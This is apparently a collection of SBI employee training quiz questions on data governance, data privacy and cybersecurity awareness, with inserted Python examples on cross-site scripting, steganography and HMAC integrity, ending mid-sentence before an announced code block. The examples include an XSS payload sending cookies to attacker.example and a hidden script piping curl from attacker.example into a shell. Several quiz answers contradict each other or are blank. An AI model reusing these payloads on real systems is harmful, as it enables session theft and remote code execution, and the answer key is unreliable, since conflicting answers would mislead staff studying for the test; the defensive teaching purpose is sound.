As per the Data Governance Policy, Data Governance Officer (DGO) needs to be nominated/designated at -

All the above


Item 5

Data Processes especially for compliance reasons do NOT include which one of the
following?

Interpretation Processes
Item 15

What is/are the responsibility(ies) of the Apex level Data Governance Council (ADGC)

All of the above


Item 19

Data Governance ensures that Data is Accessible to _____ set of People

Intended
Item 27

Data Custodians are responsible for the safe custody, transport, storage of the data and
implementation of business rules. Which of the following is a Data Custodian?

Respective IT Department
Item 6

Robust Data Management practices do NOT involve which one of the following?

Punishment
Item 11

Which of the following activities are considered under Data Management?

All of the above


Item 7

Customer sensitive Granular Data can be copied and stored without any approval

FALSE
Item 6

Restricted access to Data means:

Both 1 & 2
Item 10

For personal communication, we can use our official email IDs

FALSE
Item 18

Which of the following may not be the signs that the Mobile Phone (Android/iOS) is hacked?

All statements are signs that the Mobile phone is hacked


Item 15

The objective of setting up a wide network of ATMs across the country resembles which of the
following triad of CIA?

Availability
Item 20
Which of the following best describes the Supply chain attack?

Supply chain attack occurs when hackers infiltrate systems through an outside partner or
provider who has access to the target systems and data
Item 25

While doing an ATM transaction, a customer is required to use a physical card provided to him
by the Bank and also a PIN code to authenticate the transaction. This practice ensures which of
the following triad of Information Security?

Confidentiality
Item 4

Which of the following statement(s) is false?

Option a & b

Select the wrong statement.

Browse the Internet on company devices using system admin credentials only
Item 30

The time at which the cyber incident is brought to the knowledge of any official of __________
shall be treated as time of detection of incident.

Information Security Dept. CC Mumbai


Item 24

What are the parameters on which compensation to customer will depend for resolution of
unauthorised transactions complaints?

Time of Reporting to Bank/FI & Type of transaction (ATM/UPI/INB)


Item 12

What are the main sources for low Data Quality?

All of the above

Data Governance Policy is applicable to all the domestic offices of SBI including:

All of the above

Good Data Governance practices are also applicable to third parties having access to SBI
network and Data.

TRUE
Item 4

Data Governance Organisation involves a multi-tiered combination of business and technology roles which include(s)

All of the above


Item 5

While creating new CIF, customer has given marital status, but as it is not mandatory in CBS:

As the customer has given the details in AOF, teller should fill the same in CBS
Where does Data come from?

People, Process and Technology


Item 7

Data is always originated within the organization

FALSE
Item 8

Data Governance Vision identifies Data as :

Consistent

Data Governance Council-Business Unit/Vertical is being headed by

DMD
Item 10

(i) Data Governance is about the rules how to manage the data
(ii) Data Privacy is about the rules how to protect and use the data

Both (i) & (ii) are correct

Data Management Office (DMO) is headed by

GM & CDMO
Item 12

As per the Bank's Data Governance structure, presently which is the Apex body for Data
Governance?

Apex level Data Governance Council (ADGC)


Item 13

Who would be held responsible for not feeding in CBS all the customer details given by the
customer in the AOF?

1& 2
Item 14

Master Data Management Process Includes ______

All of the Above


Item 15

Design of better Analytics based products mainly depends on ________

Data Quality
Item 16

Who Provides directions in Data Governance Organisation?

Apex Data Governance Council / Data Governance Executive Council


Item 17

Which among the following play major role in support of company-wide Data quality initiatives?

Regulators
Item 18
Data processes must also put in place ______

All of the Above


Item 19

_________________ is ultimately accountable with regard to Data quality and value of Data in a
given subject area.

DMO
Item 20

Analytics refers to the process of using Data in order to:

All of the above


Item 21

Capturing of correct & complete data at the ____ time and ____ time should be the Mantra for
quality data

first, every
Item 22

Providing training to staff is one of the responsibilities of Data Management Office

FALSE
Item 23

Data Governance Journey in SBI started with ___

Approval of Data Governance policy by the Central Board


Item 24

Data Quality Tools and Applications come under which one of the following factors of Data
Management Practices?

Process
Item 25

Data Governance ensures Integrity of the data as ____

Single Source of Truth


Item 26

As per its objective, minimizing data errors through Data Governance brings in overall _______ in
the organization

All of the above


Item 27

Technology Solutions which help in data Governance initiatives include ______

All of the Above


Item 28

As per Interim arrangement CDMO reports to ___

CGM (ESS)
Item 29
Who can be called Data Stakeholders?

All the above


Item 30

Data Governance Policy is applicable to

All employees of the Bank

Data Stakeholders also includes ______

All of the above


Item 25

Circle Data Governance Council (C-DGC) is headed by

CIRCLE CGM

Data Governance objective is to maintain Data in _____ form

Structured
Item 3

Data Governance Council (DGC) as per the approved interim arrangement is headed by:

DMD & CIO


Item 2

Data Governance Vision identifies Data as :

Consistent
Item 22

What is the frequency of the meeting for Apex level Data Governance Council (ADGC) as per
the interim arrangement?

Quarterly
Item 21

Incorrect handling of data may result in exposing an organization to significant liabilities.

TRUE
Item 25

Data-driven business decisions are possible when _____ is involved in the Data Governance.

Business Unit
Item 17

For official communication , we can use our personal email IDs

FALSE
Item 23

Which of the following is NOT a type of Customer Sensitive Data

List of Top Management of the Bank


Item 25
Which of the following are examples of Sensitive Information:

All of the above

Select the wrong statement in case of transaction through Retail Internet Banking.

Bank sends SMS after every transaction, when the Profile section is accessed, a third party /
beneficiary is added
Item 6

What is Distributed Denial of Service Attacks?

It is a malicious attempt to disrupt the normal traffic of a targeted server, service or
network with a flood of Internet traffic from multiple computers at the same time
Item 9

Which one of the following is a unique feature of APT attacks?

An unauthorized attacker code enters a system and remains there for an extended period of
time
Item 12

Sending SMS messages to many people with bad intentions may be termed as __________.

Smishing
Item 15

Which of the following channels is not available for blocking the UPI services for unauthorized
transactions?

YONO
Item 13

_______ is a type of attack in which malicious scripts are injected into websites and web
applications for the purpose of running on the end user's device.

Cross site scripting
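
The item above defines cross-site scripting in one sentence. As an added example (not part of the quiz or the Bank's material), the snippet below shows a reflected XSS in a minimal page template next to the hardened version, in both element-text and attribute context. The renderer function names and the two attacker payloads are constructed for the demo; `html.escape` is the Python standard-library call that does the escaping.

```python
# Added example (not from the quiz): reflected cross-site scripting shown
# vulnerable and hardened. Function names and payloads are constructed.
import html

# Constructed attacker input: what a fraudster might put in a "name" parameter.
XSS_PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
# Constructed input aimed at an HTML attribute rather than element text.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(name: str) -> str:
    """Interpolates untrusted input straight into markup: the browser runs it."""
    return f"<p>Welcome, {name}!</p>"


def render_hardened(name: str) -> str:
    """Escapes the HTML metacharacters (&, <, >, quotes) so the input is
    displayed as text, never parsed as markup."""
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"


def render_attr_vulnerable(name: str) -> str:
    """Attribute context: an unescaped quote lets the input add new attributes."""
    return f'<input type="text" value="{name}">'


def render_attr_hardened(name: str) -> str:
    """Attribute context: quote the attribute AND escape the quotes inside it."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def has_live_script(markup: str) -> bool:
    """Crude test oracle: does a real <script> element or an on* handler
    survive in the markup? A real scanner would use an HTML parser; this is
    enough to show the difference between the two renderers."""
    lowered = markup.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        print(render.__name__, "->", render(XSS_PAYLOAD))
    for render in (render_attr_vulnerable, render_attr_hardened):
        print(render.__name__, "->", render(ATTR_PAYLOAD))
```

The attribute case is the one most often missed: escaping `<` and `>` alone is not enough if the value sits inside `value="..."`, because a bare `"` closes the attribute and everything after it becomes new attributes. Escape for the context the data lands in, and always quote attributes.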


Item 3

After completion of a Cash withdrawal transaction at an ATM, the system ensures to update the
customer’s balance with the withdrawal transaction before displaying it on the screen or printing
the receipt. This process is similar to which of the following triad of CIA?

Confidentiality
Item 6

"You need special software to access this part of the Web because a lot of it is encrypted, and
most of the pages are hosted anonymously." Which of the following does the statement refer
to?

Dark Web
Item 11

Which of the following statements is false?

The user’s response to bulk SMS can compromise their identities.


_____ is a technique used by the fraudsters, wherein they penetrate a system by hiding the
program/script/files within another file.

Steganography

Customer has given a written standing instruction to debit ₹ 20,000 every month from his salary
account as EMI payment to his Home loan account. To cover the property insurance amount,
the Loan officer has changed the amount to ₹ 20,500. Which one of the following is violated?

Integrity
Item 21

Who is primarily responsible for reporting cyber security incidents?

Deputy General Manager (AC) at LHO

Select the wrong statement.

For online meetings, share a link to a meeting on an unrestricted publicly available social media
post, only with password

Select the wrong statement.

EMV chip cards are vulnerable to Skimming


Item 19

Select the wrong statement.

Change password only when you suspect it has been compromised.


Item 2

If a customer reports an unauthorised transaction of Rs.6000/- (ATM) on the 5th working day. It
is a case of third party negligence. As per Limiting Liability of customer, what will be the liability
of customer in this case?

Rs.6000/-
Item 8

Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?

All cyber incidents irrespective of amount of loss


Item 9

Select the wrong statement about Desktop / Laptops /Workstations Usage?

Unauthorized personnel can access and exploit your system

Select the wrong statement.

It is not necessary to inform your organization always, if you come across any discrepancies.
Item 12

Which of the following options is not a best password security practice?

Do not share passwords with anyone other than IT staff and only at the time of
troubleshooting/maintenance of systems/software.
Item 16
How many times can you change the username in Retail Internet Banking?

Username once created cannot be changed


Item 21

After how many days of customer complaint is shadow reversal given to the customer's account in
our Bank?

On 10th working day from date of customer complaint

If a Bank always allows some of the employees to bring their own laptops, smart phones, tablets
etc. to office for office work, this policy is called BYOD. What does BYOD stand for?

Bring Your Own Device


Item 26

WannaCry was ____________ attack.

Ransomware

If an ATM Skimming happens at any ATM, who can report to IT Team?

Anyone
Item 3

Which one of the following options is not a violation of acceptable usage policy?

Receiving mails from his batchmate


Item 9

Which one of the following applications is not a threat to compromise confidentiality of the data
of portable devices?

Air watch agent


Item 20

Select the wrong statement.

Change password only when you suspect it has been compromised.


Item 24

If you have a Facebook account and you came to know about a breach in the Facebook server,
what will be your action?

Change the password of Facebook and all the services/apps offered by Facebook.

As part of IS awareness and commemoration of Computer Security Day, SBI did NOT organize
which one of the following activities?

Cold calling all the employees


Item 17

Apex level Data Governance Council (ADGC) as per the approved interim arrangement is
headed by ____

MD (R&DB)
Item 4

MODULE 1

Q: (i) Data Governance is about the rules how to build the content. (ii) Data Privacy is about the rules how to protect and use the content.
A: Both (i) & (ii) are incorrect

Q: _________________ is ultimately accountable with regard to the definition, Data quality and value of Data in a given subject area.
A: Data Custodian

Q: ________ shall ensure that there is commensurate adherence, management and periodic upkeep/review for Data in their respective custodies, as prescribed by Data Governance Policy
A: Data Owners

Q: Administrative office Data Governance Council (A-DGC) is headed by
A: DGM (B&O)

Q: Against availability of a sizeable number of eligible customers only a few confirmed leads could be generated for an Analytics based product. What could be the underlying reason?
A: Poor Data Quality

Q: Apex level Data Governance Council (ADGC) is headed by
A: CHAIRMAN

Q: As per the Bank's Data Governance structure, presently which is the Apex body for Data Governance?
A: Apex level Data Governance Council (ADGC)

Q: As per the Data Governance Policy, which of the following is the Data Custodian?
A: Respective Business Unit

Q: Capturing of correct & complete Data at the ____________ should be the Mantra
A: first time and every time

Q: Capturing of incorrect / incomplete Data adversely affects:
A: Both 1 & 2

Q: Circle Data Governance Council (C-DGC) is headed by
A: CIRCLE CGM

Q: Data Governance can NOT be achieved by Technology alone.
A: TRUE

Q: Data Governance Council (DGC) is presently being headed by
A: CHAIRMAN

Q: Data Governance does NOT refer to which one of the following terms?
A: Practices

Q: Data Governance includes
A: All of the above

Q: Data Governance is aligned with which one of the following departments?
A: Business Unit

Q: Data Governance Organisation involves a multi-tiered combination of business and technology roles which include(s)
A: All of the above

Q: Data Governance Policy is applicable to
A: All employees of the Bank

Q: Data Governance Policy is applicable to all the domestic offices of SBI including:
A: All of the above

Q: Data Governance Policy is applicable to third parties having access to SBI network and Data.
A: TRUE

Q: Data Governance Policy is formulated by which Department:
A: Data Management Office

Q: Data Governance process includes activities as:
A: All of the above

Q: Data governance processes primarily must focus on __________
A: MIS Needs of Top Mgmt.

Q: Data Management Office (DMO) is headed by
A: GM & CDMO

Q: Data Management Office reports to which of the DMDs?
A: DMD & Chief Information Officer

Q: Data Processes especially for compliance reasons do NOT include which one of the following?
A: Interpretation Processes

Q: Data processes must include ____________
A: Definitions of how data will be accessed

Q: Data Protection Officer reports to …
A: GM & Chief Data Management Officer

Q: Data Quality Tools and Applications come under which one of the following factors of Data Management Practices?
A: Technology

Q: Data-driven business decisions are possible when _____ is involved in the Data Governance.
A: Business Unit

Q: DBAs are NOT part of Data Stakeholders
A: FALSE

Q: Design of better Analytics based products mainly depends on ________
A: Data Quality

Q: In Data Management, CDE refers to
A: Correct Data Entry

Q: Incorrect handling of data may result in exposing an organization to significant liabilities.
A: TRUE

Q: Master Data Management Process includes ______
A: All of the Above

Q: Poor Data Quality may result in ______
A: Incorrect Regulatory Reporting

Q: Prime objective of Data governance framework is to ensure
A: All of the above

Q: Process for submission and handling of the Data request is mentioned in
A: Data Governance Policy

Q: Providing training to staff is one of the responsibilities of Data Privacy Officer
A: TRUE

Q: Robust Data Management practices do NOT involve which one of the following?
A: Punishment

Q: The primary priority of Data Processes must be _____
A: MIS Needs

Q: The word "Data" shall collectively refer to the following descriptions:
A: All of the above

Q: What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
A: Quarterly

Q: What is the frequency of the meeting for Data Governance Council-Business Unit/Vertical (DGC-BU/V)?
A: Quarterly

Q: What is/are the responsibility(ies) of the Data Governance Council (DGC)?
A: All of the above

Q: Where does Data come from?
A: People, Process and Technology

Q: Which among the following may be held accountable for quality of data?
A: Practices

Q: Which among the following play a major role in support of company-wide Data quality initiatives?
A: People

Q: Which among the following play a major role in support of company-wide Data quality initiatives?
A: Procedures

Q: Which of the below helps in monitoring Data Governance Activities?
A: Data Quality

Q: Which of the below helps in monitoring Data Governance Activities?
A: Data Process

Q: Which of the following is/are a Key Data Quality Dimension?
A: Accuracy

Q: Which one of the following does NOT come under People factor in Data Management practices?
A: Data Trainers

Q: While creating new CIF, customer has given marital status, but as it is not mandatory in CBS:
A: As the customer has given the details in AOF, teller should fill the same in CBS

Q: While creating new CIF, customer has given marital status, but as it is not mandatory in CBS:
A: As it is non-mandatory, teller should not fill in the details in CBS

Q: Who among the following has a role to ensure that data governance initiatives are aligned with business needs?
A: Business Units

Q: Who provides directions in Data Governance Organisation?
A: Apex Data Governance Council / Data Governance Executive Council
MODULE 2

Q: "Card Holder Details, CIF, Account Information (credentials, balance, transactions, premiums, dividends, etc.)" are classified as
A: SENSITIVE

Q: "Internal audit reports" is classified as ____________ Data
A: CONFIDENTIAL

Q: "SBI telephone directory" is classified as ____________ Data
A: PUBLIC

Q: "SOP on Data Sharing with External agencies/ Third Parties" rests on four pillars; which one of the following is NOT one of these four pillars:
A:

Q: "Training materials and manuals" are classified as ____________ Data
A: INTERNAL

Q: A customer has submitted Driving License as OVD, along with AOF. During the scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF to be checked; even then, if he is less than 18 yrs, OVD not to be accepted

Q: A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF, if same, then only account may be opened

Q: A staff can be held accountable for Data quality errors.
A: TRUE

Q: An SBI Card employee sitting in a branch asks for a list of high value customers along with Mobile numbers for telecalling to sell SBI cards for the Branch. Branch may share the list with SBI Card employee.
A: TRUE

Q: As per Data Protection Bill (Draft) PII stands for
A: Personally Identifiable Information

Q: Branch has sanctioned a Car loan to one of its staff, but the loan instalment was not fed in HRMS. The staff paid the instalment through his account and informed the BM that a SI has been registered for the same.
A: Recovery of staff loan should be through HRMS only, so recovery details in HRMS need to be updated

Q: Can we store customer data on our Desktop?
A: NO

Q: Capturing of incorrect security in secured loan accounts may result in _____________.
A: Both 1 & 2

Q: Customer Sensitive Granular Data made available through SSO to ensure an audit trail comes under which one of the following?
A: Need to Know

Q: Data Quality Index (DQI) dashboard measures the Data Quality for
A: CIFs & Loans

Q: Data quality is necessary to fulfil the needs of an organization in terms of
A: All of the above

Q: DQI dashboard displays errors
A: All of the above

Q: DQI Index has been included as one of the Key Responsibility Areas (KRAs) in Career Development System (CDS)
A: TRUE

Q: Error categories in DQI for CIF related errors are: A. Risk categorization B. Personal Profile C. PAN Related D. Gender Related E. Age Related
A: A, B, C, D & E

Q: For official communication, we can use our personal email IDs
A: FALSE

Q: For personal communication, we can use our official email IDs
A: FALSE

Q: If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us, shall we share the list?
A: Cannot be shared

Q: Impact of poor Data Quality on a Branch includes ____
A: Both 1 & 2 above

Q: In ________________ Processing, a small group of transactions is processed on demand
A: Batch

Q: In an Account Opening Form, if Data has been provided by the customer in a non-mandatory field (like mobile number / email ID), what should be done while inputting in CBS?
A: Input the Data exactly as given by the customer

Q: In the Data Infringement portal, unattended infringements on Data Loss Prevention (DLP) may result in _____
A: Penal Score (1 to 4 marks) in RFIA of the Branch

Q: Incorrect spelling of Customer name comes under which one of the following Data Quality Dimensions?
A: Accuracy

Q: Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
A: Both 1 & 2

Q: Non-sensitive Information includes:
A: Public Information

Q: Restricted access to Data means:
A: Both 1 & 2

Q: Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
A: All of the above

Q: Sharing of customer sensitive granular Data is governed by which Policy:
A: Data Governance Policy

Q: Sharing of Data with external agencies is governed by
A: SOP on Data Sharing with External agencies/third parties

Q: Some of the key Data Privacy initiatives include:
A: All of the above

Q: Some of the key Data Privacy initiatives include:
A: Secure Cloud Data Storage system

Q: The access to Customer Sensitive Granular Data to the users should be made strictly on the basis of
A: Both 1 & 2

Q: To boost the housing loan business of the branch, list of HNIs can be shared with HLCs through:
A: Not to be shared

Q: What are the different categories of Data Classification?
A: SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC

Q: What are the impacts of feeding incorrect date of birth of a customer in CBS?
A: 1 & 2

Q: What are the impacts of not verifying the pop-up name of PAN holder, while fetching PAN details?
A: 1 & 2

Q: What are the possible means by which Customer Sensitive Granular Data can get divulged or leaked to any unrelated person / third party like vendors, dealers etc.?
A: All of the above

Q: What does GDPR stand for?
A: General Data Protection Regulation

Q: What is needed to create Data Quality Index?
A: Dashboards and scorecards.

Q: What is/are the possible consequences of Data Leakage?
A: All the above

Q: Which of the following is NOT a type of Customer Sensitive Data?
A: List of Top Management of the Bank

Q: Which of the following is not a type of Data leak?
A: Improper categorization of sensitive Data

Q: Which of the following is true:
A: All of the above

Q: Which one is NOT an approved way of sharing granular Data/access Data under normal circumstances:
A: E-mail

Q: Which Portal is to be accessed for Data Loss Prevention (DLP) incidents?
A: Data Infringement Portal

Q: While inputting temporary address of a customer in CBS, it should be taken care that
A: "From & To" date in the temporary screen needs to be filled in as declared by the customer

Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3
MODULE 3

Q: __________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?
A: Scareware

Q: _____________ is a technique used by the fraudsters, wherein they penetrate a system by hiding the program/script/files within another file.
A: Steganography
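
The steganography item (here and in the earlier question block) says a file is hidden inside another file. As an added example, not from the quiz or the Bank's material, the code below implements the simplest such scheme, least-significant-bit embedding: each bit of the hidden payload replaces the lowest bit of one carrier byte, so a picture or audio clip looks and sounds unchanged while carrying a script. The carrier (a synthetic 64x64 gradient standing in for pixel data), the payload and all function names are constructed for the demo.

```python
# Added example (not from the quiz): least-significant-bit steganography,
# i.e. one file's bytes hidden inside another file's bytes. The cover data
# and the payload below are constructed for the demo.
import struct
from typing import Iterator


def _bits_msb_first(data: bytes) -> Iterator[int]:
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, payload: bytes) -> bytes:
    """Hide payload in the lowest bit of successive cover bytes.

    A 4-byte big-endian length header is embedded first so the extractor
    knows where the payload ends. Each cover byte changes by at most 1, which
    is why the carrier (an image, an audio sample, etc.) still looks normal."""
    framed = struct.pack(">I", len(payload)) + payload
    needed = len(framed) * 8
    if needed > len(cover):
        raise ValueError(f"cover too small: need {needed} bytes, have {len(cover)}")
    out = bytearray(cover)
    for i, bit in enumerate(_bits_msb_first(framed)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def _read_lsb_bytes(carrier: bytes, bit_offset: int, count: int) -> bytes:
    """Reassemble count bytes from the LSBs starting at bit_offset."""
    buf = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (carrier[bit_offset + b * 8 + k] & 1)
        buf.append(value)
    return bytes(buf)


def extract(carrier: bytes) -> bytes:
    """Recover the hidden payload; raises if the header does not fit."""
    if len(carrier) < 32:
        raise ValueError("carrier too small for a length header")
    (length,) = struct.unpack(">I", _read_lsb_bytes(carrier, 0, 4))
    if 32 + length * 8 > len(carrier):
        raise ValueError("length header exceeds carrier size")
    return _read_lsb_bytes(carrier, 32, length)


def max_byte_delta(a: bytes, b: bytes) -> int:
    """Largest per-byte change between two equal-length buffers."""
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed cover: 64x64 8-bit grayscale gradient standing in for real
# pixel data (4096 bytes, so it can carry up to 508 payload bytes).
COVER = bytes(((x + y) // 2) & 0xFF for y in range(64) for x in range(64))
# Constructed payload: the kind of script a fraudster would want to smuggle.
PAYLOAD = b"#!/bin/sh\ncurl -s http://attacker.example/p | sh\n"


def demo() -> tuple[bytes, bytes, int]:
    """Embed, extract, and measure how little the carrier changed."""
    stego = embed(COVER, PAYLOAD)
    return stego, extract(stego), max_byte_delta(COVER, stego)


if __name__ == "__main__":
    stego, recovered, delta = demo()
    print("recovered:", recovered)
    print("max per-byte change:", delta)
```

The point for a defender: the carrier's size, type and appearance do not change, so file-type checks and antivirus signatures on the carrier itself rarely catch this. Controls that help are the ones the Bank's data-sharing rules already lean on: restrict which channels may carry files out, and inspect what is actually inside an attachment rather than trusting its extension.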

Q: _____________ is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a connection is established, the attacker will be able to steal photos, messages, contacts etc.
A: Bluesnarfing

Q: "You need special software to access this part of the Web because a lot of it is encrypted, and most of the pages are hosted anonymously." Which of the following does the statement refer to?
A: Dark Web

Q: A fraudster may use Social engineering techniques to steal critical information of a user. Which of the following options is not true in case of social engineering?
A: Social engineering uses Human traits, Curiosity, Concern around and technical hacking techniques

Q: After completion of a Cash withdrawal transaction at an ATM, the system ensures to update the customer's balance with the withdrawal transaction before displaying it on the screen or printing the receipt. This process is similar to which of the following triad of CIA?
A: Availability

Q: Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. He is redirected to a site of SBI. Before he logs in, what should be the website address on the screen?
A: It should start with https://www.onlinesbi.com

Q: Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the new security feature in OnlineSBI?
A: OTP has been made mandatory at the time of login

Q: If a Cyber attack is carried out by sending to SBI's customers an email that claims to be from SBI but it's not, then what kind of cyber attack technique is it?
A: Phishing Attack

Q: If a hacker manages to exploit the vulnerability before software developers can find a fix, that exploit becomes known as a _______.
A: Zero day attack

Q: If you click on the padlock sign in the Address bar, which of the following information will be available to you?
A: You will get information on who owns the site and who has verified the site

Q: In Social engineering attacks, the fraudsters lure/appeal to the potential victims to gain confidence to reveal confidential information and use the same for fraud and system access.
A: APT attacks may be identified immediately as it shuts down the whole system

Q: Mr. Ajay had tried to login to Mr. Deepak's SBI net banking. He tried thrice but failed. Now when Mr. Deepak tries to login with his correct password, will he be able to do so?
A: After 3 invalid attempts, the user id is automatically locked for one day. Thereafter Mr. Deepak can login.

Q: Non-repudiation is carried out through the services of authentication, authorization, confidentiality, and integrity. Confidentiality ensures which one of the following?
A: Secure encryption of the information

Q: Pretending to be an Airtel customer service executive and contacting the victim is called ____________.
A: Vishing

Q: Select the correct statement about the impact of Cyber Risks.
A: All are true

Q: Select the incorrect option.
A: Deep Web - Research Papers & Medical Records

Q: Select the wrong statement.
A: Option a & b

Q: Select the wrong statement.
A: Cyber Security primarily focuses on protecting employees' information on computers

Q: Sending SMS messages to many people with bad intentions may be termed as __________.
A: Smishing

Q: Social Engineering Attacks do not include ________________.
A: Denial of Service attack

Q: The data loss or compromise while charging the mobile is called ________.
A: Juice Jacking

Q: The fraudster gets the personal details of the people through _______ technique.
A: Social engineering

Q: The malware which can record the keystrokes on a keyboard in order to gain access to sensitive information is known as ________________ malware.
A: Keylogger

Q: The objective of setting up a wide network of ATMs across the country resembles which of the following triad of CIA?
A: Availability

Q: The technique used to send the emails to all the employees of the Bank is known as ____________.
A: Spear Phishing

Q: Third party attacks are attractive to hackers, because ____________.
A: Third party systems have less robust security controls

Q: What is a "Collect Request" in a UPI transaction?
A: It is a feature available in BHIM SBI Pay

Q: What is a keylogger?
A: It is a surveillance software that records every keystroke made in the system, creates a file and sends it to a specified server.

Q: What is Denial of Service Attacks?
A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traffic from multiple computers at the same time

Q: What is Distributed Denial of Service Attacks?
A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traffic from multiple computers at the same time

Q: What is not true about Juice-jacking?
A: Disabling data transfer mode in Settings will not help in this case

Q: What is not true about myths associated with Cyber Risk?
A: Cyber threat always starts externally

Q: What is not true about SIM Swapping?
A: SIM Swapping is also known as SIM cloning

Q: What is not true about SIM Swapping?
A: Fraudsters get access to the root of the mobile phone through SIM Swapping

Q: What makes SolarWinds attack an unusual hack?
A: The hackers, through one malicious code in SolarWinds Orion software, gained access to thousands of other companies.

Q: What makes SolarWinds hack one of the biggest and the most dangerous Cyber attacks?
A: This attack was designed to impact one vendor and subsequently all their clients

Q: Where is the option to lock user access in SBI Retail Internet Banking?
A: Lock User access option is available in the login page of Retail INB

Q: Which of the following attacks is not categorised under Exploit based attacks?
A: Distributed Denial of Service attacks

Q: Which of the following best describes the Supply chain attack?
A: Supply chain attack occurs when hackers infiltrate systems through an outside partner or provider who has access to the target systems and data

Q: Which of the following browsers allows access to the Network which is popular for implementing encrypted routing technology and preventing user tracking?
A: Tor

Q: Which of the following channels is NOT available for blocking the UPI services for unauthorized transactions?
A: YONO

Q: Which of the following is NOT an objective of Non-repudiation?
A: It offers a high level of assurance that the information, objects and resources are accessible to authorized subjects within the promised timeframe.

Q: Which of the following is not an example of data?
A: All are examples of data

Q: Which of the following may not be the signs that the Mobile Phone (Android/iOS) is hacked?
A: All statements are signs that the Mobile phone is hacked

Q: Which of the following Mobile Apps may be suggested to resolve the issues related to non-receipt of OTP (through SMS) for their transaction?
A: SBI Secure OTP

Q: Which of the following options is not to protect yourself from keyloggers?
A: Check your physical hardware, keep your system locked and protect from unauthorised access.

Q: Which of the following principles of the second of CIA Triad, Integrity, is/are correct? a. Integrity is the concept of protecting the accuracy and completeness of information and processing methods. b. Integrity protection prevents any kind of alteration of the information. c. Properly implemented integrity protection provides a means for authorized changes while protecting against intended and malicious unauthorized activities (such as viruses and intrusions) as well as mistakes made by authorized users (by commission or omission). d. Use of a secure Hashing algorithm for the information ensures Integrity.
A: a, c and d
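
Two items on this page concern integrity: the standing-instruction case in the earlier question block (a loan officer changes a ₹20,000 instruction to ₹20,500) and statement d above (a secure hashing algorithm ensures integrity). The added example below, which is not from the quiz or the Bank's systems, puts the two together: a bare SHA-256 digest does detect the change, but an insider who can edit the record can also overwrite the stored digest, so a keyed HMAC (or a digital signature) held by the system, not by the user, is what actually stops the tampering from being accepted. The record fields, the key and all function names are constructed for the demo.

```python
# Added example (not from the quiz): protecting a standing-instruction record
# against the kind of tampering the quiz describes. The record fields and the
# key are constructed for the demo; a real key would live in an HSM or vault.
import hashlib
import hmac
import json

STANDING_INSTRUCTION = {
    "debit_account": "00000012345678",   # constructed
    "credit_account": "00000087654321",  # constructed
    "amount_inr": 20000,
    "frequency": "monthly",
    "purpose": "home loan EMI",
}

# Secret held by the system that recorded the customer's instruction, not by
# any branch user. Constructed; never hard-code real keys.
SI_KEY = bytes.fromhex("6ca9e7d3e0e1b6a63f0f1b36c9f2b0b4a6e9e1d3c8b7a6958473625140f1e2d3")


def canonical(record: dict) -> bytes:
    """Stable serialisation: the same content always gives the same bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def digest(record: dict) -> str:
    """Plain SHA-256: detects accidental change, but anyone can recompute it."""
    return hashlib.sha256(canonical(record)).hexdigest()


def tag(record: dict, key: bytes = SI_KEY) -> str:
    """Keyed HMAC-SHA256: recomputing it needs the key."""
    return hmac.new(key, canonical(record), hashlib.sha256).hexdigest()


def verify_tag(record: dict, expected_tag: str, key: bytes = SI_KEY) -> bool:
    """Constant-time comparison so the check does not leak the tag byte by byte."""
    return hmac.compare_digest(tag(record, key), expected_tag)


def with_changes(record: dict, **changes) -> dict:
    """Copy of record with some fields altered (what the loan officer did)."""
    altered = dict(record)
    altered.update(changes)
    return altered


def demo() -> dict:
    original_tag = tag(STANDING_INSTRUCTION)
    altered = with_changes(STANDING_INSTRUCTION, amount_inr=20500)

    # An insider who can edit the record can also overwrite a stored bare
    # hash with a fresh one, so a digest alone does not prove integrity.
    forged_digest = digest(altered)

    return {
        "digest_changed": digest(altered) != digest(STANDING_INSTRUCTION),
        "forged_digest_matches": forged_digest == digest(altered),
        "tag_valid_for_original": verify_tag(STANDING_INSTRUCTION, original_tag),
        "tag_valid_for_altered": verify_tag(altered, original_tag),
        # without SI_KEY the insider cannot produce a tag the system accepts
        "forged_tag_accepted": verify_tag(altered, tag(altered, b"guessed-key")),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Statement d is therefore true only when the digest itself is protected: either keyed (HMAC), signed, or stored somewhere the person who can edit the record cannot reach. Canonical serialisation matters too; if field order or whitespace can vary, legitimate records will fail verification.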

Q: Which one is not an option for disabling UPI services?
A: YONO Main Screen UPI Enable/Disable UPI

Q: Which one of the following is a good safety measure while using www.onlinesbi.com?
A: The website address should start with https and there should be a padlock sign
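
The two OnlineSBI items above (the address "should start with https://www.onlinesbi.com", and "https plus a padlock") are good habits, but a practitioner should know their limit: a fraudster can register a domain whose URL also begins with that text, and the padlock only proves an encrypted connection to whatever host is really in the bar. The added example below, not from the quiz or the Bank's material, contrasts the by-eye prefix rule with parsing the URL and matching the host exactly. The allow-list of bank hosts and every sample URL except the first are constructed for the demo.

```python
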